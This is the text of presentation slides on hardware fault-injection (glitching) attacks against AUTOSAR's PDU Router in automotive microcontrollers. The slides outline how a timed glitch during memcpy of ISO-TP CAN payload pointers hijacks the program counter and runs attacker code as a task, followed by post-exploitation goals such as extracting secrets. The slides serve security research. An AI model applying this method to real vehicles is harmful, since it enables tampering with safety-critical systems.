AUTOSAR’s PDU Router 1. CAN driver receives 8-byte CAN frame 2. Frame passes the CAN interface 3. Payload is reassembled by ISO-TP 4. Payload is copied to COM or DCM 77
AUTOSAR’s PDU Router 1. CAN driver receives 8-byte CAN frame 2. Frame passes the CAN interface 3. Payload is reassembled by ISO-TP 4. Payload is copied to COM or DCM 5. COM or DCM handles the payload 78
Where do we attack?! 79
AUTOSAR’s PDU Router 1. CAN driver receives 8-byte CAN frame 2. Frame passes the CAN interface 3. Payload is reassembled by ISO-TP 4. Payload is copied to COM or DCM 5. COM or DCM handles the payload 80
Attacking AUTOSAR’s PDU router 81
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) 82
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Our to ‘free memory’ task 83
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Our to ‘free memory’ task to ‘free memory’ task 84
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our to ‘free memory’ task to ‘free memory’ current task task 85
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our Pointers pointing to the start of the payload to ‘free memory’ task to ‘free memory’ current task task 86
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our Pointers pointing to the start of the payload to ‘free memory’ task to ‘free memory’ current task task • Step 2: We inject the glitch when the pointers are being copied 87
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our Pointers pointing to the start of the payload to ‘free memory’ task to ‘free memory’ current task task • Step 2: We inject the glitch when the pointers are being copied • Step 3: Successful glitches load a pointer into the PC register 88
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our Pointers pointing to the start of the payload to ‘free memory’ task to ‘free memory’ current task task • Step 2: We inject the glitch when the pointers are being copied • Step 3: Successful glitches load a pointer into the PC register • Step 4: MCU will execute the ISO-TP message (blue blocks) 89
Attacking AUTOSAR’s PDU router • Step 1: Send an ISO-TP CAN message (< 4096 bytes) Copy ‘Our task’ Modify pointer of IDLE Continue with Our Pointers pointing to the start of the payload to ‘free memory’ task to ‘free memory’ current task task • Step 2: We inject the glitch when the pointers are being copied • Step 3: Successful glitches load a pointer into the PC register • Step 4: MCU will execute the ISO-TP message (blue blocks) • Step 5: Wait for IDLE task to be scheduled and execute our task 90
Why does this work? 91
Attacking AUTOSAR’s PDU Router 92
Attacking AUTOSAR’s PDU Router Disassembled memcpy() 93
Attacking AUTOSAR’s PDU Router Disassembled memcpy() 94
Attacking AUTOSAR’s PDU Router Disassembled memcpy() We take control of the Program Counter (PC) during the copy! 95
We have our own task. Now what?! 96
Post Exploitation 97
Post Exploitation • Extract information (secrets) 98
Post Exploitation • Extract information (secrets) • Analyze firmware dynamically 99
Post Exploitation • Extract information (secrets) • Analyze firmware dynamically • Perform additional attacks (e.g. side channel attack) 100
Recommend
More recommend